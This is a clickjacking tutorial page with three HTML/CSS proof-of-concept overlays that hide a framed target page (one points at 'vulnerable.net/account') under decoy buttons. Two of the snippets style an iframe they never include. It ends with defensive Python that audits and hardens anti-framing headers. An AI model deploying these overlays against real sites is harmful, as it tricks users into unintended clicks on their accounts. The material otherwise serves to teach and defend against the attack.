# Clickjacking

Clickjacking is an attack that **tricks** a **user** into **clicking** a webpage **element** which is **invisible** or disguised as another element. This can cause users to unwittingly download malware, visit malicious web pages, provide credentials or sensitive information, transfer money, or purchase products online. (From [here](https://www.imperva.com/learn/application-security/clickjacking/)).

Sometimes it is possible to **fill the values of form fields using GET parameters when loading a page**. An attacker may abuse this behaviour to pre-fill a form with arbitrary data and then serve the clickjacking payload so that the user only has to press the Submit button.

If you need the user to **fill a form** but you don't want to ask him directly to type some specific information (like your email address or a specific password that you know), you can instead ask him to **Drag\&Drop** something that writes your controlled data into the field, as in [**this example**](https://lutfumertceylan.com.tr/posts/clickjacking-acc-takeover-drag-drop/).

```
<!-- Basic overlay: the target page is loaded in an almost transparent iframe
     (opacity 0.1) stacked above a visible decoy, so a click on "Click me"
     actually lands on the framed page. -->
<style>
  iframe {
    position: relative;
    width: 500px;
    height: 700px;
    opacity: 0.1;
    z-index: 2;
  }
  div {
    position: absolute;
    top: 470px;
    left: 60px;
    z-index: 1;
  }
</style>
<div>Click me</div>
```

```
<!-- Multistep variant: two decoys positioned under two different controls of
     the framed page, so the user performs two clicks in the intended order. -->
<style>
  iframe {
    position: relative;
    width: 500px;
    height: 500px;
    opacity: 0.1;
    z-index: 2;
  }
  .firstClick, .secondClick {
    position: absolute;
    top: 330px;
    left: 60px;
    z-index: 1;
  }
  .secondClick {
    left: 210px;
  }
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://vulnerable.net/account"></iframe>
```

```
<!-- Overlay with fixed-position decoys (.xss) placed over the controls of the
     framed page; the numbered labels walk the user through the clicks. -->
<html>
<head>
<style>
  #payload {
    position: absolute;
    top: 20px;
  }
  iframe {
    width: 1000px;
    height: 675px;
    border: none;
  }
  .xss {
    position: fixed;
    background: #F00;
  }
</style>
</head>
<body>
<div style="height: 26px;width: 250px;left: 41.5%;top: 340px;" class="xss">.</div>
<div style="height: 26px;width: 50px;left: 32%;top: 327px;background: #F8F;" class="xss">1. Click and press delete button</div>
<div style="height: 30px;width: 50px;left: 60%;bottom: 40px;background: #F5F;" class="xss">3.Click me</div>
</body>
</html>
```
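All three overlays above depend on the target page being embeddable in a cross-origin `<iframe>`. The defender-side check for that is whether the response carries `X-Frame-Options: DENY`/`SAMEORIGIN` or, preferably, a CSP `frame-ancestors` directive (which takes precedence over `X-Frame-Options` in browsers that support it). The following Python is an added example, not code from the original page: it audits a response's headers for framing protection and produces a hardened header set. It assumes headers are available as a plain dict; the sample responses and the `partner.example` origin are constructed placeholders.

```python
"""Audit and harden HTTP response headers against clickjacking (framing).

Added example; assumes response headers as a {name: value} dict.
"""
from typing import Dict, List

# Constructed sample responses (not captured from any real site).
SAMPLE_RESPONSES: Dict[str, Dict[str, str]] = {
    "no_protection": {"Content-Type": "text/html"},
    "xfo_deny": {"X-Frame-Options": "DENY"},
    "xfo_allow_from": {"X-Frame-Options": "ALLOW-FROM https://partner.example"},
    "csp_none": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"},
    "csp_wildcard": {"Content-Security-Policy": "frame-ancestors *"},
}


def parse_csp(value: str) -> Dict[str, List[str]]:
    """Split a Content-Security-Policy header into {directive: [sources]}."""
    policy: Dict[str, List[str]] = {}
    for directive in value.split(";"):
        tokens = directive.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def framing_verdict(headers: Dict[str, str]) -> Dict[str, object]:
    """Decide whether a third-party page can frame this response.

    Returns a dict with 'embeddable_cross_origin' (bool), the 'mechanism'
    that protects the page (or None) and a list of 'findings'.
    """
    h = {k.lower(): v.strip() for k, v in headers.items()}
    findings: List[str] = []
    verdict: Dict[str, object] = {"embeddable_cross_origin": True,
                                  "mechanism": None, "findings": findings}

    csp = parse_csp(h.get("content-security-policy", ""))
    xfo = h.get("x-frame-options", "").upper()

    if "frame-ancestors" in csp:
        # CSP wins over X-Frame-Options wherever frame-ancestors is supported.
        sources = [s.lower() for s in csp["frame-ancestors"]]
        # '*' or a bare scheme (https:) lets any origin embed the page.
        if any(s in ("*", "http:", "https:") for s in sources):
            findings.append("frame-ancestors allows arbitrary origins")
        else:
            verdict["embeddable_cross_origin"] = False
            verdict["mechanism"] = "csp-frame-ancestors"
        if not xfo:
            findings.append("add X-Frame-Options for browsers without CSP level 2")
    elif xfo in ("DENY", "SAMEORIGIN"):
        verdict["embeddable_cross_origin"] = False
        verdict["mechanism"] = "x-frame-options"
        findings.append("add CSP frame-ancestors; X-Frame-Options is the legacy mechanism")
    elif xfo.startswith("ALLOW-FROM"):
        # Obsolete syntax: current browsers ignore the whole header.
        findings.append("ALLOW-FROM is obsolete and ignored; page is embeddable")
    else:
        findings.append("no framing protection header present")
    return verdict


def harden(headers: Dict[str, str]) -> Dict[str, str]:
    """Return a copy of the headers with both anti-framing mechanisms set to deny.

    Existing CSP directives are preserved; only frame-ancestors is replaced.
    """
    out = {k: v for k, v in headers.items() if k.lower() != "x-frame-options"}
    out["X-Frame-Options"] = "DENY"
    csp_key = next((k for k in out if k.lower() == "content-security-policy"),
                   "Content-Security-Policy")
    policy = parse_csp(out.get(csp_key, ""))
    policy["frame-ancestors"] = ["'none'"]
    out[csp_key] = "; ".join(" ".join([name, *srcs]) for name, srcs in policy.items())
    return out


if __name__ == "__main__":
    for label, hdrs in SAMPLE_RESPONSES.items():
        print(label, framing_verdict(hdrs))
    print("hardened:", harden(SAMPLE_RESPONSES["csp_wildcard"]))
```

Run it on headers pulled from a real response (for example `dict(requests.get(url).headers)`) to see which of the sample verdicts a page falls into; `harden()` is what the server-side middleware should emit for any page that must never be framed. Pages that legitimately need embedding by one partner should list that single origin in `frame-ancestors` rather than fall back to `ALLOW-FROM`, which browsers no longer honour.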
